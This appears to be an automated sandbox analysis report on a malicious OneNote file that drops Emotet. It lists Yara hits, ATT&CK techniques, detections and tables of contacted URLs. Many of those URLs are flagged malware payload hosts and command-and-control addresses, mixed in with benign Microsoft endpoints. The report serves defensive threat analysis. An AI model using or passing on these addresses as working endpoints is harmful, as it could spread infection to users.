File source: iMedPub_LTD_4.one, type: SAMPLE

Yara detected Emotet

Source: Yara match	File source: 0000000D.00000002.816093001.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 13.2.regsvr32.exe.c90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.1060000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.1060000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.815803054.0000000000CC1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.815608298.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.320685564.0000000001060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Malicious OneNote

Source: Yara match

File source: iMedPub_LTD_4.one, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	2 Registry Run Keys / Startup Folder	111 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	2 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Scripting	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	114 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Regsvr32	DCSync	25 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
iMedPub_LTD_4.one	31%	ReversingLabs	Script-WScript.Trojan.OneNote

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll	58%	ReversingLabs	Win64.Trojan.Emotet
C:\Windows\System32\RPJQOdVdSbhDZ\IMSnbfr.dll (copy)	58%	ReversingLabs	Win64.Trojan.Emotet

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
13.2.regsvr32.exe.c90000.0.unpack	100%	Avira	HEUR/AGEN.1215476		Download File
12.2.regsvr32.exe.1060000.0.unpack	100%	Avira	HEUR/AGEN.1215476		Download File

Domains

Source	Detection	Scanner	Label	Link
penshorn.org	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://my.microsoftpersonalcontent.com	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://d.docs.live.net	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://wus2.pagecontentsync.	0%	URL Reputation	safe
https://167.172.199.165:8080//dslbwuw/s	100%	Avira URL Cloud	malware
https://cortana.ai/api	0%	URL Reputation	safe
https://149.56.131.28:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
https://82.223.21.224:8080/	100%	Avira URL Cloud	malware
https://91.207.28.33:8080/	100%	Avira URL Cloud	malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/	100%	Avira URL Cloud	malware
https://206.189.28.199:8080/	100%	Avira URL Cloud	malware
https://164.90.222.65/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
http://ozmeydan.com/cekici/9/	100%	Avira URL Cloud	malware
https://penshorn.org/admin/Ses8712iGR8du/tM	100%	Avira URL Cloud	malware
https://103.43.75.120/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
https://182.162.143.56/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/?	100%	Avira URL Cloud	malware
https://penshorn.org/admin/Ses	100%	Avira URL Cloud	malware
https://167.172.199.165:8080/bwuw/	100%	Avira URL Cloud	malware
https://10.207.28.33:8080/	0%	Avira URL Cloud	safe
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0	100%	Avira URL Cloud	malware
https://213.239.212.5/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/u	100%	Avira URL Cloud	malware
https://66.228.32.31:7080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
https://187.63.160.88:80/g	100%	Avira URL Cloud	malware
https://206.189.28.199:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
https://167.172.199.165:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/c	100%	Avira URL Cloud	malware
https://microsoftapc-my.sharepoint.com	0%	Avira URL Cloud	safe
https://213.239.212.5:443/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
https://167.172.199.165:8080/	100%	Avira URL Cloud	malware
https://206.189.28.199:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/0	100%	Avira URL Cloud	malware
https://182.162.143.56/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
http://softwareulike.com/cW4	0%	Avira URL Cloud	safe
https://213.239.212.5/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
https://www.gomespontes.com.br/logs/pd/	100%	Avira URL Cloud	malware
https://167.172.199.165:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
https://103.43.75.120/	100%	Avira URL Cloud	malware
https://187.63.160.88:80/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	100%	Avira URL Cloud	malware
https://penshorn.org:443/admin/Ses8712iGR8du/on	100%	Avira URL Cloud	malware
http://ozmeydan.com/cekici/9/xM	100%	Avira URL Cloud	malware
https://169.57.156.166:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/~	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
penshorn.org	203.26.41.131	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://182.162.143.56/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://shell.suite.office.com:1443	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://autodiscover-s.outlook.com/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://82.223.21.224:8080/	regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://cdn.entity.	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://149.56.131.28:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	regsvr32.exe, 0000000D.00000002.816987046.0000000000E78000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://rpsticket.partnerservices.getmicrosoftkey.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/	wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.332605666.000000000558A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.aadrm.com/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://api.microsoftstream.com/api/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://167.172.199.165:8080//dslbwuw/s	regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cr.office.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://206.189.28.199:8080/	regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://91.207.28.33:8080/	regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://res.getmicrosoftkey.com/api/redemptionevents	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://officeci.azurewebsites.net/api/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
http://ozmeydan.com/cekici/9/	wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://my.microsoftpersonalcontent.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://164.90.222.65/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://103.43.75.120/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.office.cn/addinstemplate	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://penshorn.org/admin/Ses8712iGR8du/tM	wscript.exe, 0000000A.00000003.340717850.00000000050D0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://182.162.143.56/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/?	regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://messaging.engagement.office.com/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0	wscript.exe, 0000000A.00000003.340717850.00000000050CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://www.odwebp.svc.ms	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://web.microsoftstream.com/video/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://167.172.199.165:8080/bwuw/	regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://graph.windows.net	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://penshorn.org/admin/Ses	wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333322944.0000000005606000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333584044.0000000005623000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347587677.000000000564C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333494137.000000000560D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335128897.000000000564C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://consent.config.office.com/consentcheckin/v1.0/consents	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://10.207.28.33:8080/	regsvr32.exe, 0000000D.00000002.816434632.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d.docs.live.net	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://ncus.contentsync.	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
http://weather.service.msn.com/data.aspx	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://213.239.212.5/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/u	regsvr32.exe, 0000000D.00000002.817123962.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://pushchannel.1drv.ms	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://167.172.199.165:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/c	regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wus2.contentsync.	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/ios	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://66.228.32.31:7080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://clients.config.office.net/user/v1.0/android/policies	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://entitlement.diagnostics.office.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://187.63.160.88:80/g	regsvr32.exe, 0000000D.00000003.462908363.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://outlook.office.com/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://206.189.28.199:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	regsvr32.exe, 0000000D.00000002.817123962.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://microsoftapc-my.sharepoint.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	Avira URL Cloud: safe	unknown
https://substrate.office.com/search/api/v1/SearchHistory	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://167.172.199.165:8080/	regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://graph.windows.net/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://devnull.onenote.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://213.239.212.5:443/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://messaging.office.com/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://206.189.28.199:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/0	regsvr32.exe, 0000000D.00000002.817123962.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://softwareulike.com/cW4	wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333322944.0000000005606000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333584044.0000000005623000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347587677.000000000564C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333494137.000000000560D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335128897.000000000564C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://skyapi.live.net/Activity/	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://213.239.212.5/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	regsvr32.exe, 0000000D.00000002.816907496.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.816907496.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.gomespontes.com.br/logs/pd/	wscript.exe, wscript.exe, 0000000A.00000003.330462855.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.335756850.0000000005709000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334389573.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333860223.0000000005638000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341212440.000000000588F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.345380845.0000000005728000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333925882.0000000005658000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333542268.00000000055E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329822485.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330213444.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330343076.00000000054EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338605530.00000000056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334176110.00000000055DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.325763800.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.326506362.000000000539A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347654351.0000000005650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333969896.0000000005628000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.324507207.00000000053AD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.cortana.ai	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://messaging.action.office.com/setcampaignaction	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://visio.uservoice.com/forums/368202-visio-on-devices	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://staging.cortana.ai	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/embed?	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://167.172.199.165:8080/mmqwctzklyfzc/sythi/gsaatcnbjyw/dslbwuw/	regsvr32.exe, 0000000D.00000003.462908363.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://augloop.office.com	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://api.diagnosticssdf.office.com/v2/file	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory	825FCF33-FA95-48F7-9D0C-913B41374CD9.0.dr	false		high
